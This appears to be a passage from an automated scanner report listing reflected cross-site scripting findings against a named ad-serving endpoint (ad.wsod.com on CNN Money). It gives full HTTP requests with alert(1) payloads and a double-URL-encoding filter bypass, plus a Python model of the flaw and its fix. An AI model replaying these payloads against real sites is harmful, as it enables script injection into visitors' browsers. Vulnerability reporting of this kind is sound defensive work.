GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=4832394976e"-alert(1)-"161b2a8b1d2&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2685

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909294**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=4832394976e"-alert(1)-"161b2a8b1d2&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485
...[SNIP]...

1.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [AdID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the AdID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b32"><script>alert(1)</script>18aa2cb0e34 was submitted in the AdID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239d7b32"><script>alert(1)</script>18aa2cb0e34&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239d7b32"><script>alert(1)</script>18aa2cb0e34&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485
...[SNIP]...

1.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the FlightID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8b33c"-alert(1)-"84acdd203 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=3514438b33c"-alert(1)-"84acdd203&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2681

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/1300909291**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=3514438b33c"-alert(1)-"84acdd203&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163
...[SNIP]...

1.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [FlightID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the FlightID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b018b"><script>alert(1)</script>c9cc5ecaa40 was submitted in the FlightID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443b018b"><script>alert(1)</script>c9cc5ecaa40&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:41:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2715

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=351443b018b"><script>alert(1)</script>c9cc5ecaa40&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163
...[SNIP]...

1.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76120%2522%253balert%25281%2529%252f%252f3f80d6e04ca was submitted in the REST URL parameter 2. This input was echoed as 76120";alert(1)//3f80d6e04ca in the application's response.

Caveat: in the response fragment below the reflection sits inside a single-quoted, concatenated string ('<scr'+'ipt ... src="'+wsod.proto+'//ad.wsod.com/embed/...'), so the injected " does not terminate that JavaScript literal and the // does not start a comment there; the value reaches the browser as an unencoded " inside the src="..." attribute of the script tag that string assembles. The reflection itself is confirmed, but verify the breakout character (' at the JavaScript level, " at the attribute level) against the full response before reusing this exact payload.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135776120%2522%253balert%25281%2529%252f%252f3f80d6e04ca/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2713

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135776120";alert(1)//3f80d6e04ca/1538.0.iframe.306x25/1300909348**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,30
...[SNIP]...

1.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 975bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f4016cb7dd was submitted in the REST URL parameter 2. This input was echoed as 975bb"><script>alert(1)</script>2f4016cb7dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357975bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f4016cb7dd/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2758

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
73,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357975bb"><script>alert(1)</script>2f4016cb7dd/1538.0.iframe.306x25/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acece%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea48e62f48b4 was submitted in the REST URL parameter 3. This input was echoed as acece"><script>alert(1)</script>a48e62f48b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25acece%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea48e62f48b4/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2758

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25acece"><script>alert(1)</script>a48e62f48b4/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1c4c%2522%253balert%25281%2529%252f%252f978a12363d4 was submitted in the REST URL parameter 3. This input was echoed as b1c4c";alert(1)//978a12363d4 in the application's response.

Caveat: as with 1.84, the response fragment below shows the reflection inside a single-quoted, concatenated string ('<scr'+'ipt ... src="'+wsod.proto+'//ad.wsod.com/embed/...'), so the injected " does not close that JavaScript literal; it lands unencoded in the src="..." attribute of the script tag that string assembles. Confirm whether ' or " is the effective breakout character against the full response before reusing this exact payload.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
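Findings 1.84 through 1.87 all turn on the same ordering defect: a filter that rejects < and " after decoding the path segment once, in front of application code that decodes the already-decoded value a second time before echoing it. The following is an added example that models that pipeline and its fix; it is not code from ad.wsod.com (the vendor's server-side code, reported as PHP, is not visible here), and the two-stage decode is an assumption chosen as the simplest explanation for %253c being accepted while %3c is rejected. The payloads are the ones from 1.84 and 1.85.

```python
"""Double-URL-decoding bypass modelled on findings 1.84-1.87.

Constructed example, not code from ad.wsod.com. It assumes a two-stage
pipeline: a filter that decodes the path segment once and rejects dangerous
characters, followed by application code that decodes the already-decoded
value a second time before echoing it into a double-quoted attribute.
"""
from html import escape
from urllib.parse import quote, unquote

BLOCKED = set('<>"\'')

# Payloads copied from findings 1.85 and 1.84 respectively.
ATTR_PAYLOAD = "975bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2f4016cb7dd"
JS_PAYLOAD = "76120%2522%253balert%25281%2529%252f%252f3f80d6e04ca"


def double_encode(canary: str) -> str:
    """Build the double-encoded form of a probe the way a tester would:
    percent-encode everything, then percent-encode the % signs again."""
    return quote(quote(canary, safe=""), safe="")


def filter_passes(raw_segment: str) -> bool:
    """Stage 1 (assumed filter): decode once, reject if a blocked char appears."""
    return not (BLOCKED & set(unquote(raw_segment)))


def vulnerable_render(raw_segment: str):
    """Stage 2 as deployed: decode a second time, then echo into a
    double-quoted href attribute. Returns None when stage 1 rejected the input."""
    if not filter_passes(raw_segment):
        return None
    value = unquote(unquote(raw_segment))  # %2522 -> %22 -> "
    return f'<a href="http://ad.wsod.com/click/{value}/" target="_blank">'


def hardened_render(raw_segment: str):
    """Fix: decode exactly once, validate the decoded value, and HTML-encode it
    for the attribute context. Whatever survives the single decode is literal
    text; a leftover %22 stays %22 and never becomes a quote."""
    value = unquote(raw_segment)
    if BLOCKED & set(value):
        return None
    return f'<a href="http://ad.wsod.com/click/{escape(value, quote=True)}/" target="_blank">'


def decode_passes(raw_segment: str) -> int:
    """Number of unquote() passes that still change the value: 2 for a
    double-encoded probe, 1 for an ordinary encoded value, 0 for plain text.
    Handy when triaging request logs for this bypass pattern."""
    passes, current = 0, raw_segment
    while True:
        decoded = unquote(current)
        if decoded == current:
            return passes
        passes, current = passes + 1, decoded
```

Running vulnerable_render(ATTR_PAYLOAD) reproduces the 975bb"><script>alert(1)</script>2f4016cb7dd breakout from 1.85, while hardened_render on the same input echoes the percent sequences verbatim. The general rule the example illustrates: decode once at the edge, never again in the application, and encode for the output context rather than filtering input characters.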

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25b1c4c%2522%253balert%25281%2529%252f%252f978a12363d4/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2713

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25b1c4c";alert(1)//978a12363d4/1300909350**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,859
...[SNIP]...

1.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK [Redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK

Issue detail

The value of the Redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51663"><script>alert(1)</script>a907b67cc6e was submitted in the Redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1538.0.iframe.306x25/dovflta,bgyutdligxmWK?click=http://ads.cnn.com/event.ng/Type=click&FlightID=351443&AdID=483239&TargetID=16169&Segments=1637,1641,2244,2743,3083,3285,7044,7182,8598,12257,17251,18961,22176,25344,30220,31691,33852,34172,40223,40773,42274,42703,43109,45351,45497,45604,45611,46101,46163,46484,46485,46486,46694,46792,46909,47090,47353,47387,47399,47805&Values=1589&Redirect=51663"><script>alert(1)</script>a907b67cc6e HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=306x25_spon&cnn_money_rollup=homepage&cnn_money_section=last_five_quotes&params.styles=fs&tile=1300909177539&page.allowcompete=yes&domId=80976
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:477:985:45:0:42331:1300828252:L|46:477:988:45:0:42331:1300828246:L|46:477:988:45:0:42331:1300828243:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 23 Mar 2011 19:42:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
